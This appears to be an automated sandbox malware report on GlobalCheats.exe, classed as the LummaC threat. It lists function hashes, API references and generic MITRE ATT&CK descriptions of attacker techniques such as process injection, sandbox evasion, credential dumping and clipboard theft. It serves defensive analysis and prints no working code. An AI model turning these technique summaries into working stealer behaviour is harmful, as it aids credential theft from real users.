Instruction Fuzzy Hash: 59D0CA3AA082018F8248FE19F4AA93273B5E70A224704A67CD506E3B4AC6A0A801CA08

Function 032CCCE2 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55ad7ebca9a16352753d4aaaf9272e824725e0be701122b290e25efd56dcdcff
Instruction ID: c1749cb34d1fb5c158fa9d60fe282bd07546cf9dd22c65b76ac00ec20351771c
Opcode Fuzzy Hash: 55ad7ebca9a16352753d4aaaf9272e824725e0be701122b290e25efd56dcdcff
Instruction Fuzzy Hash: 8DC00270845282CED3024F24D410361BFF0AB07350F1420A0C445AB351E3BA40568B49

Function 032DDA37 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 178COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 032DDAB1
GetSystemMetrics.USER32 ref: 032DDAC2
DeleteObject.GDI32 ref: 032DDB24
SelectObject.GDI32 ref: 032DDB72
SelectObject.GDI32 ref: 032DDC12
DeleteObject.GDI32 ref: 032DDC49

Strings

, xrefs: 032DDBE5

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID: Object$DeleteMetricsSelectSystem
String ID:
API String ID: 3911056724-3916222277
Opcode ID: 4f677f14faf2d1f7cf18969426d90689d6df55818d2621022779d150490b2146
Instruction ID: 7c439eecb635aabd82d682599e23dc3a0031b29b91696a69b195b9fa618bd2ff
Opcode Fuzzy Hash: 4f677f14faf2d1f7cf18969426d90689d6df55818d2621022779d150490b2146
Instruction Fuzzy Hash: BE8149B4604B00DFC750EF29E595A1ABBF0FB49304F10896DE99ACB364D731A849CF92

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report GlobalCheats.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Possible Origin

Network Behavior

Network Port Distribution

Windows Analysis Report
GlobalCheats.exe

Function 032DD360 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 207
COMMON

Function 032B9EC0 Relevance: 11.7, Strings: 9, Instructions: 451
COMMON

Function 032D6551 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 404
COMMON

Function 032D6563 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 381
COMMON

Function 032D6A63 Relevance: 3.7, APIs: 2, Instructions: 688
COMMON

Function 032DA40E Relevance: 31.6, APIs: 1, Strings: 17, Instructions: 84
memoryCOMMON

Function 032E66C5 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 59
libraryCOMMON

Function 032E6596 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76
libraryCOMMON

Function 032E6837 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63
libraryCOMMON

Function 032E2F80 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28
COMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre